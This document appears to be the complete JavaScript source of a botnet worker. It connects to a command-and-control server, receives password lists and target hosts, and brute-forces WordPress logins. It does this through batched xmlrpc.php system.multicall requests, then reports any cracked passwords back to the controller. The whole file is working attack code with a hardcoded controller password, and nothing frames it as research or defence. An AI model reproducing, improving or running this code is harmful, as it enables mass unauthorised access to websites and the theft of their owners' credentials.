'use strict';

let net = require('net');
let fs = require('fs');
let path = require('path');
let http = require('http');
let https = require('https');
let URL = require('url');
let querystring = require('querystring');
let xml2js = require('../modules/xml2js');

let passes = [];
let server;
function logToFile(str) {
  console.log(str);
  try {
    fs.appendFileSync('err123.log', str + '\r\n');
  } catch(e) {
    console.log(e);
  }
}


process.on('uncaughtException', function(err) {
  let str = new Error().stack.toString();
  str += ' \n\r ';
  str += err.toString() + ' \n\r ';
  str += err.stack.toString();
  str += '\n---------------------------------\n\r';
  console.log(str);
  try {
    fs.appendFileSync('err123.log', str + ' \n\r ');
  } catch (e) {
    console.log('WTF');
  }
  server.sendDebugMsg({
    err: err,
    stack: err.stack.toString(),
    str: str
  });
  console.log('uncaught happened. exiting');
  setTimeout(() => {
    process.exit(0);
  }, 1000);
});


function readErr() {
  let err = '';
  try {
    fs.readFileSync('err123.log').toString().trim();
    err = err.substring(0, 1000);
  } catch (e) {
    err = e.toString();
  }
  return err;
}


let config = {
  sentinel: '\0',
  pass : 'TRL98nxH63DQDq9Qz711',
  timeout: 20 * 60 * 1000
};

config.host = process.argv[3];
config.port = process.argv[4];
config.botID = process.argv[2];


function getRandomInt(min, max) {
  return Math.floor(Math.random() * (max - min + 1)) + min;
}


class Connection {
  constructor(sock, onMsg, onClose) {
    if (!sock.remoteAddress) {
      return;
    }
    sock.on('close', () => {
      onClose();
    });
    sock.on('error', err => {

    });
    sock.on('end', () => {
      sock.end();
    });
    sock.on('data', data => {
      this._onData.call(this, data);
    });

    this._onMsg = onMsg;

    this._sock = sock;
    this._recData = '';
    this._ip = sock.remoteAddress;
    this._alive = true;
  }

  _deleteAllMsgsFrom(recData) {
    let split = recData.lastIndexOf(config.sentinel);
    if (split === -1) {
      console.log('split err' + recData);
      logToFile('split err. ' + recData);
    }
    return recData.substring(split + 1);
  };

  _extractAllMsgsFrom(recData) {
    let arr = [];
    while (true) {
      let split = recData.indexOf(config.sentinel);
      if (split === -1) {
        break;
      }
      let msg = recData.substring(0, split);
      recData = recData.substring(split + 1);
      arr.push(msg);
    }
    return arr;
  };

  _onData(data) {
    this._recData += data;
    let msgs = this._extractAllMsgsFrom(this._recData);
    if (msgs.length === 0) {
      /* not fully received yet;*/
      return;
    }
    this._recData = this._deleteAllMsgsFrom(this._recData);
    for (let i = 0; i < msgs.length; i++) {
      let msg = msgs[i];
      console.log(msg);
      this._handleRawMsg(msg);
    }
  }

  _handleRawMsg(msg) {
    if (msg === '') {
      this.send('{}' + config.sentinel); // keep alive
      return;
    }
    let resp = null;
    let msgObj = '';
    try {
      msgObj = JSON.parse(msg);
    } catch (e) {
      logToFile('invalid msg');
      logToFile(msg);
      return;
    }
    resp = this._onMsg(msgObj);
    if (resp) {
      this.sendMsg(resp);
    }
  }

  sendMsg(msg) {
    this._sock.write(JSON.stringify(msg) + config.sentinel);
  }

  send(str) {
    this._sock.write(str);
  }

  die() {
    this._sock.end();
    this._sock.destroy();
  }

}

class Server {
  constructor(ip, port, onMsg) {
    this._ip = ip;
    this._port = port;
    this._con = null;
    this._onMsg = onMsg;
    this._connect();
    this._nConnects = 0;
  }
  getNConnects() {
    return this._nConnects;
  }
  die() {
    this._onClose = function() {

    };
    if (this._con) {
      this._con.sendMsg({
        type: 'dying'
      });
      console.log('dying................');
      this._con.die();
    }
  }
  _onClose() {
    console.log('server disconnected.exiting');
    process.exit(0);
    this._con = null;
    setTimeout(() => {
      this._connect();
    });
    console.log('disconnected');
  }
  _onConnect() {
    this._nConnects++;
    this._con.sendMsg({
      type: 'pass',
      pass: config.pass,
      botID: config.botID,
      err: readErr()
    });
  }

  sendDebugMsg(msg) {
    let resp = {
      type: 'debug',
      'msg': msg
    };
    this.sendMsg(resp);
  }
  sendMsg(msg) {
    if (!this._con) {
      return;
    }
    this._con.sendMsg(msg);
  }

  _connect() {
    if (this._con) {
      this._con.die();
      this._con = null;
    }
    let onCanNotConnect = function() {
      console.log('can not connect');
      setTimeout(() => {
        this._connect();
      }, 1000);
    }.bind(this);
    let socket = net.connect(this._port, this._ip, () => {
      socket.removeListener('close', onCanNotConnect);
      this._con = new Connection(socket, this._onMsg, this._onClose.bind(this));
      console.log('connected');
      this._onConnect();
      let timeout = config.timeout + getRandomInt(0, 1 * 60 * 1000);
      socket.setTimeout(timeout, () => {
        socket.end();
        socket.destroy();
        console.log('timeout happened shit. exiting');
        process.exit(0);
      });
      socket.setKeepAlive(true, 60 * 1000);
    });

    socket.on('error', (err) => {
      console.log(err);
    });
    socket.on('close', onCanNotConnect);

  }
}

function formatHost(host) {
  let res = host;
  if (host.indexOf('http://') === 0) {
    res = host;
  } else if (host.indexOf('https://') === 0) {
    res = host;
  } else {
    res = 'http://' + host;
  }

  if (res[res.length - 1] === '/') {
    return res;
  } else {
    return res + '/';
  }
}

function isHttp(host) {
  if (host.indexOf('http://') === 0) {
    return true;
  }
  return false;
}

let XMLRPC_HEADERS = {'Accept':'application/xml', 'Accept-Language':'en-US', 'Cache-Control':'max-age=0', 'Connection':'keep-alive', 'Content-Type':'application/application/xml', 'User-Agent':"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36"};

let HEADERS = {'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language':'en-US,en;q=0.8,ka;q=0.6', 'Cache-Control':'max-age=0', 'Connection':'keep-alive', 'Content-Type':'application/x-www-form-urlencoded', 'User-Agent':"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36"};

//let HEADERS = {'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language':'en-US,en;q=0.8,ka;q=0.6', 'Cache-Control':'max-age=0', 'Connection':'keep-alive', 'Content-Type':'application/x-www-form-urlencoded', 'User-Agent':"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36"};


function isLoggedIn(source) {
  if (source.indexOf('type="password"') !== -1) {
    return false;
  }
  if (source.indexOf("type='password'") !== -1) {
    return false;
  }
  // change
  if (source.indexOf('var ajaxurl = \'/wp/wp-admin/admin-ajax.php\'') !== -1) {
    return true;
  }
  return undefined;
}

function getHeaderByName(name, headers) {
  for (let i = 0; i < headers.length; i += 2) {
    if (i >= headers.length) {
      break;
    }
    if (headers[i] !== name) {
      continue;
    }
    i++;
    if (i >= headers.length) {
      break;
    }
    return headers[i];
  }
  return null;
}

function getRealHostName(host, timeout, cb) {
  return cb(null, host);
  let getter = https;
  if (isHttp(host)) {
    getter = http;
  }
  let timeoutId;
  let req = getter.get(host, function(res) {
    clearTimeout(timeoutId);
    res.socket.end();
    res.socket.destroy();
    let location = getHeaderByName('Location', res.rawHeaders);
    if (location) {
      host = location;
    }
    cb(null, host);
    cb = function() {};
  }).on('error', function(e) {
    clearTimeout(timeoutId);
    console.log('error');
    console.log(e);
    cb(e);
    cb = function() {};
  });

  timeoutId = setTimeout(() => {
    req.abort();
    cb('timeout1: ' + timeout * 1000 + ' ' + host + ' ');
    cb = function() {};
  }, timeout * 1000);
}

function parsePass(user, pass) {
  if (pass.indexOf('%user%') === -1) {
    return pass;
  }
  return pass.replace('%user%', user);
}

function buildXml(user, passes, start, end) {
  let xmlStart = "<?xml version=\"1.0\"?>\n<methodCall>\n  <methodName>system.multicall</methodName>\n  <params>\n    <param><value><array><data>\n";
  let xmlEnd = "    </data></array></value>\n    </param>\n  </params>\n</methodCall>\n";

  let nodeStart = "<value><struct>\n<member>\n<name>methodName</name>\n<value><string>wp.getUsersBlogs</string></value>\n</member>\n<member>\n<name>params</name><value><array><data>\n<value><array><data>\n<value><string>";
  let nodeMiddle = "</string></value>\n<value><string>";
  let nodeEnd = "</string></value>\n</data></array></value>\n</data></array></value>\n</member>\n</struct></value>";
  let str = xmlStart;
  for (let i = start; i < end; i++) {
    let pass = parsePass(user, passes[i]);
    str += nodeStart + user + nodeMiddle + pass + nodeEnd;
  }
  str += xmlEnd;
  return str;
}

function checkXmlRpcResp(xmlResp, cb) {
  let parseString = xml2js.parseString;
  try {
    parseString(xmlResp, (err, result) => {
      if (err) {
        console.log(err);
        return cb(false);
      }
      try {
        result = result.methodResponse;
        result = result.params;
        result = result[0];
        result = result.param;
        result = result[0].value[0].array[0].data[0].value;
        console.log(result);
        console.log(result.length);
        for (let i = 0; i < result.length; i++) {
          let r = result[i];
          if (r.struct) {
            continue;
          }
          try {
            r = r.array[0].data[0].value[0].array[0].data;
            if (r) {
              return cb(i);
            } else {
              continue;
            }
            //    r = r[0].value[0].struct[0].member[0];
            console.log(r);
          } catch (e) {
            continue;
          }
        }
      } catch (e) {
        console.log(e);
        return cb(false);
      }
      return cb(false);
    });
  } catch (e) {
    cb(false);
  }

}

function sendXmlrpcReq(host, user, xmlrpc, timeout, cb) {
  let getter = https;
  if (isHttp(host)) {
    getter = http;
  }

  let url = host + 'xmlrpc.php';

  let parsedUrl = URL.parse(url);
  let postData = xmlrpc;
  let port = 80;
  if (getter === https) {
    port = 443;
  }
  if (parsedUrl.port) {
    port = parsedUrl.port;
  }

  let options = {
    hostname: parsedUrl.hostname,
    port: port,
    path: parsedUrl.path,
    method: 'POST',
    headers: XMLRPC_HEADERS
  };
  console.log(options);
  options.headers['Content-Length'] = postData.length;
  let timeoutId;
  let response = null;
  let req = getter.request(options, (res) => {
    let status = res.statusCode;
    res.setEncoding('utf8');
    response = res;
    let content = '';
    console.log('response received: %d', status);
    console.log(res.rawHeaders);
    res.on('data', chunk => {
      console.log('ondata');
      content += chunk.toString();
    });
    res.on('end', () => {
      console.log('onend');
      clearTimeout(timeoutId);
      cb(null, status, res.rawHeaders, content);
      cb = function() {};
    });
  }).on('error', (e) => {
    clearTimeout(timeoutId);
    cb(e);
    console.log(options);
    console.log('error on %s', host);

    cb = function() {};
  });

  req.write(postData);
  req.end();

  timeoutId = setTimeout(() => {
    req.abort();
    cb('timeout2');
    cb = function() {};
  }, 10 * 1000);

}

function checkGivenPasswords(host, user, start, end, timeout, cb) {
  let xml = buildXml(user,passes, start, end);
  console.log(host);

  sendXmlrpcReq(host, user, xml, timeout, (err, status, headers, content) => {
    let msg = null;
    if (err) {
      cb(err);
      return;
    }
    console.log(content.substring(0, 1000));
    let res = checkXmlRpcResp(content, res => {
      if (res === false) {
        cb(null, false);
      } else {
        let pass = passes[start + res];
        cb(null, pass);
      }
    });
  });

}

function checkHost(host, user, start, end, timeout, msgId, server) {
  let h = host;
  host = formatHost(host);

  getRealHostName(host, 5, (err, result) => {
    if (err) {
      server.sendMsg({
        id: msgId,
        type: 'checkHost',
        err: err
      });
      return;
    }

    host = result;
    if (end >= passes.length) {
      end = passes.length - 1;
    }

    checkGivenPasswords(host, user, start, end, timeout, (err, pass) => {

      if (err) {
        console.log('checkgivenpasswords');
        console.log('host was: %s', h);
        console.log('host now is: %s', host);

        console.log(err);
        server.sendMsg({
          type: 'checkHost',
          id: msgId,
          success: false,
          error: err
        });
        return;
      }

      let msg = {
        type: 'checkHost',
        id: msgId,
        success: pass ? true : false,
        pass: pass ? pass : undefined
      };
      server.sendMsg(msg);

    });
  });
  return;
}

server = new Server(config.host, config.port, onMsg);

function onMsg(msg) {
  console.log(msg);
  if (msg.type === 'die') {
    console.log('dying');
    process.exit(0);
  } else if (msg.type === 'checkHost') {
    checkHost(msg.host, msg.user, msg.start, msg.end, msg.timeout, msg.id, server);
  } else if (msg.type === 'passwordList') {
    passes = msg.passwords;
  } else {
    server.sendDebugMsg({
      msg: 'unknown msg received. dying'
    });
    console.log('unknown msg');
    console.log(msg);
    process.exit(0);
  }
}
